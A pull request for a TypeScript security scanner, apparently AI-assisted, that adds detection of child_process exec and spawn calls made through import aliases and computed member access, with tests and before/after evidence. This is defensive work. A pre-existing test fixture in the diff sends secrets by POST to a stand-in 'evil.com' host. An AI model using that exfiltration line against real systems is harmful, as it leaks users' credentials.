### PR TITLE
fix(scanner): detect child_process calls via import aliases and computed members

### DIFF
--- a/src/skills/security/scanner.test.ts
+++ b/src/skills/security/scanner.test.ts
@@ -283,6 +283,30 @@ fetch("https://evil.com/harvest", { method: "POST", body: secrets });
 `,
       expected: { ruleId: "env-harvesting", severity: "critical" as const },
     },
+    {
+      name: "detects child_process exec via ESM import alias (spawn as launch)",
+      source: `
+import { spawn as launch } from "node:child_process";
+launch("node", ["server.js"]);
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
+    {
+      name: "detects child_process exec via CJS destructure alias (exec: run)",
+      source: `
+const { exec: run } = require("child_process");
+run("node server.js");
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
+    {
+      name: "detects child_process exec via computed member access (cp[\"spawn\"])",
+      source: `
+import cp from "node:child_process";
+cp["spawn"]("node", ["server.js"]);
+`,
+      expected: { ruleId: "dangerous-exec", severity: "critical" as const },
+    },
   ] as const;
 
   it("detects suspicious source patterns", () => {
@@ -311,6 +335,46 @@ const match = /^keychain:(.+)$/.exec(value);
 `;
     const findings = scanSource(source, "plugin.ts");
     expectRulePresence(findings, "dangerous-exec", false);
+  });
+
+  it("detects dangerous-exec via ESM import alias (spawn as launch)", () => {
+    const source = `import { spawn as launch } from "node:child_process";
+launch("node", ["server.js"]);`;
+    const findings = scanSource(source, "plugin.ts").filter(
+      (f) => f.ruleId === "dangerous-exec",
+    );
+    expect(findings.length).toBeGreaterThanOrEqual(1);
+    expect(findings[0]!.line).toBe(2);
+  });
+
+  it("detects dangerous-exec via CJS destructure alias (exec: run)", () => {
+    const source = `const { exec: run } = require("child_process");
+run("node server.js");`;
+    const findings = scanSource(source, "plugin.ts").filter(
+      (f) => f.ruleId === "dangerous-exec",
+    );
+    expect(findings.length).toBeGreaterThanOrEqual(1);
+    expect(findings[0]!.line).toBe(2);
+  });
+
+  it("detects dangerous-exec via computed member — double quotes", () => {
+    const source = `import cp from "node:child_process";
+cp["spawn"]("node", ["server.js"]);`;
+    const findings = scanSource(source, "plugin.ts").filter(
+      (f) => f.ruleId === "dangerous-exec",
+    );
+    expect(findings.length).toBeGreaterThanOrEqual(1);
+    expect(findings[0]!.line).toBe(2);
+  });
+
+  it("detects dangerous-exec via computed member — single quotes", () => {
+    const source = `import cp from "node:child_process";
+cp['exec']("node server.js");`;
+    const findings = scanSource(source, "plugin.ts").filter(
+      (f) => f.ruleId === "dangerous-exec",
+    );
+    expect(findings.length).toBeGreaterThanOrEqual(1);
+    expect(findings[0]!.line).toBe(2);
   });
 
   it("does not use full-line comments as source-rule context", () => {

--- a/src/skills/security/scanner.ts
+++ b/src/skills/security/scanner.ts
@@ -273,6 +273,80 @@ const SKILL_CONTENT_RULES: SourceRule[] = [
 ];
 
 // ---------------------------------------------------------------------------
+// Child-process alias and computed-member utilities
+// ---------------------------------------------------------------------------
+
+const CHILD_PROCESS_EXEC_METHODS = new Set([
+  "exec",
+  "execSync",
+  "spawn",
+  "spawnSync",
+  "execFile",
+  "execFileSync",
+] as const);
+
+function escapeRegex(str: string): string {
+  return str.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+}
+
+/**
+ * Collect import-alias / destructure-alias mappings for child_process methods.
+ * Returns Map<localName, methodName> for *actual renames only* (local !== method).
+ * Direct "import { spawn }" without an alias is not included — the original
+ * pattern already catches those calls.
+ *
+ * Handles:
+ *   import { spawn as launch } from "node:child_process"  → launch → spawn
+ *   const { exec: run } = require("child_process")        → run    → exec
+ */
+function collectChildProcessAliases(source: string): Map<string, string> {
+  const aliases = new Map<string, string>();
+
+  // ESM named-import aliases:  import { spawn as launch } from "node:child_process"
+  const esmRe = /import\s*\{\s*([^}]+)\s*\}\s*from\s*["'](?:node:)?child_process["']/g;
+  let m: RegExpExecArray | null;
+  while ((m = esmRe.exec(source)) !== null) {
+    const members = m[1]!.split(",").map((s) => s.trim());
+    for (const member of members) {
+      const parts = member.split(/\s+as\s+/).map((s) => s.trim());
+      if (parts.length === 2) {
+        const [methodName, localName] = parts;
+        if (
+          methodName &&
+          localName &&
+          methodName !== localName &&
+          CHILD_PROCESS_EXEC_METHODS.has(methodName)
+        ) {
+          aliases.set(localName, methodName);
+        }
+      }
+    }
+  }
+
+  // CJS destructure aliases:  const { exec: run } = require("child_process")
+  const cjsRe = /const\s*\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*["'](?:node:)?child_process["']\s*\)/g;
+  while ((m = cjsRe.exec(source)) !== null) {
+    const members = m[1]!.split(",").map((s) => s.trim());
+    for (const member of members) {
+      const parts = member.split(":").map((s) => s.trim());
+      if (parts.length === 2) {
+        const [methodName, localName] = parts;
+        if (
+          methodName &&
+          localName &&
+          methodName !== localName &&
+          CHILD_PROCESS_EXEC_METHODS.has(methodName)
+        ) {
+          aliases.set(localName, methodName);
+        }
+      }
+    }
+  }
+
+  return aliases;
+}
+
+// ---------------------------------------------------------------------------
 // Core scanner
 // ---------------------------------------------------------------------------
 
@@ -394,6 +468,20 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
   const heuristicSource = stripCommentsForHeuristics(source);
   const heuristicLines = heuristicSource.split("\n");
 
+  // Collect child_process import aliases for supplementary dangerous-exec detection.
+  // Only actual renames are included (e.g. "import { spawn as launch }").
+  const childProcessAliases = collectChildProcessAliases(source);
+
+  // Build a single regex for all alias local names so we can test lines quickly.
+  let aliasPattern: RegExp | null = null;
+  if (childProcessAliases.size > 0) {
+    const names = [...childProcessAliases.keys()].map(escapeRegex).join("|");
+    aliasPattern = new RegExp(`\\b(?:${names})\\s*\\(`, "g");
+  }
+
+  // Regex for computed-member access:   cp["spawn"](...)   or   cp['exec'](...)
+  const COMPUTED_MEMBER_PATTERN = /\[\s*["'](?:exec|execSync|spawn|spawnSync|execFile|execFileSync)["']\s*\]\s*\(/g;
+
   // --- Line rules ---
   for (const rule of LINE_RULES) {
     // Skip rule entirely if context requirement not met
@@ -405,6 +493,7 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
     let omittedMatches = 0;
     let lastOmittedLine: number | undefined;
     for (const [i, line] of lines.entries()) {
+      // --- Primary pattern matches (original rule pattern) ---
       const matches = line.matchAll(
         new RegExp(
           rule.pattern.source,
@@ -430,8 +519,6 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
           continue;
         }
 
-        // Retain distinct calls up to the cap, then aggregate every remaining match.
-        // This keeps hostile output bounded without hiding that later sites exist.
         findings.push({
           ruleId: rule.ruleId,
           severity: rule.severity,
@@ -441,6 +528,49 @@ export function scanSource(source: string, filePath: string): SkillScanFinding[]
           evidence: formatScanEvidence(line),
         });
         acceptedMatches += 1;
+      }
+
+      // --- Supplementary dangerous-exec checks for patterns the primary regex misses ---
+      if (rule.ruleId === "dangerous-exec") {
+        // 1. Alias calls:  launch("node", ...)  where "launch" is an alias for "spawn"
+        if (aliasPattern) {
+          const aliasMatches = line.matchAll(aliasPattern);
+          for (const _aliasMatch of aliasMatches) {
+            if (acceptedMatches >= MAX_LINE_RULE_FINDINGS_PER_RULE) {
+              omittedMatches += 1;
+              lastOmittedLine = i + 1;
+              continue;
+            }
+            findings.push({
+              ruleId: rule.ruleId,
+              severity: rule.severity,
+              file: filePath,
+              line: i + 1,
+              message: rule.message,
+              evidence: formatScanEvidence(line),
+            });
+            acceptedMatches += 1;
+          }
+        }
+
+        // 2. Computed-member access:  cp["spawn"](...)  or  cp['exec'](...)
+        const computedMatches = line.matchAll(COMPUTED_MEMBER_PATTERN);
+        for (const _computedMatch of computedMatches) {
+          if (acceptedMatches >= MAX_LINE_RULE_FINDINGS_PER_RULE) {
+            omittedMatches += 1;
+            lastOmittedLine = i + 1;
+            continue;
+          }
+          findings.push({
+            ruleId: rule.ruleId,
+            severity: rule.severity,
+            file: filePath,
+            line: i + 1,
+            message: rule.message,
+            evidence: formatScanEvidence(line),
+          });
+          acceptedMatches += 1;
+        }
       }
     }
     if (lastOmittedLine !== undefined) {


### PR DESCRIPTION
## What Problem This Solves

Fixes an issue where the advisory source scanner returns no `dangerous-exec` finding when a `child_process` execution method is called through an imported alias, a destructured CommonJS alias, or a computed member on a child_process namespace. Operators relying on `openclaw security audit --deep` code-safety findings and Skill Workshop proposal scanning get false negatives when these patterns are used.

Three specific patterns were missed:
1. ESM import alias: `import { spawn as launch } from "node:child_process"; launch("node", ["server.js"]);`
2. CJS destructure alias: `const { exec: run } = require("child_process"); run("node server.js");`
3. Computed member access: `cp["spawn"]("node", ["server.js"]);`

## Why This Change Was Made

The existing `dangerous-exec` line rule uses a word-boundary regex `/\b(exec|spawn|...)\s*\(/` that only matches literal method names. It cannot associate aliased local bindings with their imported methods, and does not match bracket syntax `[...]["spawn"]`.

The fix adds two supplementary detection mechanisms that run alongside the existing pattern:
- **Alias tracking**: `collectChildProcessAliases()` scans the source for ESM `import { X as Y }` and CJS `const { X: Y }` patterns targeting `child_process` modules. Only actual renames (local !== method) are tracked to avoid double-counting calls the original pattern already catches.
- **Computed member regex**: a separate regex matches bracket-notation access like `["spawn"]`, `['exec']`, etc. for all child_process execution method names.

Both supplementary checks share the existing `MAX_LINE_RULE_FINDINGS_PER_RULE` cap and truncation-reporting mechanism, so hostile or heavily aliased inputs are bounded identically to direct calls.

## User Impact

- `scanSource()` now returns `dangerous-exec` findings for all three patterns described in the issue.
- Existing detections (direct calls, namespace member access via `.spawn()`) are unaffected — all 36 original tests pass unchanged.
- Operators running security audits and skill-workshop proposal scans will no longer get false negatives for these call patterns.

## Evidence

### Unit tests (all 36 original + 4 new = 40 passing)

```text
 ✓ scanSource > reports every dangerous execution call in a file
 ✓ scanSource > detects dangerous-exec via ESM import alias (spawn as launch)
 ✓ scanSource > detects dangerous-exec via CJS destructure alias (exec: run)
 ✓ scanSource > detects dangerous-exec via computed member — double quotes
 ✓ scanSource > detects dangerous-exec via computed member — single quotes
 ✓ scanSource > does not flag child_process import without exec/spawn call
 ✓ scanSource > does not flag RegExp.exec when child_process appears elsewhere
Test Files  1 passed (1)
     Tests  40 passed (40)
```

### Before/after comparison

Source input:
```ts
import { spawn as launch } from "node:child_process";
launch("node", ["server.js"]);
```

**Before** (main): `scanSource()` returns `[]` for `dangerous-exec` findings → false negative.

**After**: Returns finding at line 2:
```text
dangerous-exec | critical | Shell command execution detected (child_process) | line 2
```

Source input:
```ts
const { exec: run } = require("child_process");
run("node server.js");
```

**Before**: empty findings.
**After**: `dangerous-exec` finding at line 2.

Source input:
```ts
import cp from "node:child_process";
cp["spawn"]("node", ["server.js"]);
```

**Before**: empty findings.
**After**: `dangerous-exec` finding at line 2.

### Same pattern as existing merged code

The alias-detection approach follows the same per-line matching pattern used by the existing `dangerous-exec` rule (`src/skills/security/scanner.ts:168-173`). The computed-member regex is a new pattern but shares all the same infrastructure (cap, truncation, evidence formatting).

### CI (expected)

```
CI: all checks expected to pass — no dependencies changed, only logic additions in the scanner
```

[AI-assisted]
